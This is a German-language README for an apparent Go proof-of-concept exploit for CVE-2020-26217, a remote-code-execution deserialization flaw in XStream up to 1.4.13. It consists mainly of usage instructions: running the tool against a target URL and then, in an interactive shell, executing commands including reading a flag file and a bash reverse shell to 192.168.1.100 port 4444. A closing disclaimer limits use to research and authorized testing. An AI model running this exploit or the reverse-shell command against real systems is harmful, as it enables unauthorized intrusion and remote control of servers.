
CVE-2020-26217 XStream Deserialisierungs-PoC
XStream-Exploit-Tool für Remote-Code-Ausführung.
CVE-2020-26217 ist eine Deserialisierungsschwachstelle in der XStream-Bibliothek. Ein Angreifer kann durch das Erstellen bösartiger XML-Daten eine Remote-Code-Ausführung auslösen.
Betroffene Version: XStream <= 1.4.13
go run poc.go <Ziel-URL>
# Tool ausführen
go run poc.go http://target.com:8080/?data
# Nach dem Wechsel in den interaktiven Modus Befehle eingeben
cmd> whoami
cmd> cat /flag
cmd> bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
cmd> exit
go build -o poc poc.go
Dieses Tool dient ausschließlich der Sicherheitsforschung und autorisierten Tests. Eine Nutzung für illegale Zwecke ist untersagt. Der Anwender trägt die entsprechende rechtliche Verantwortung selbst.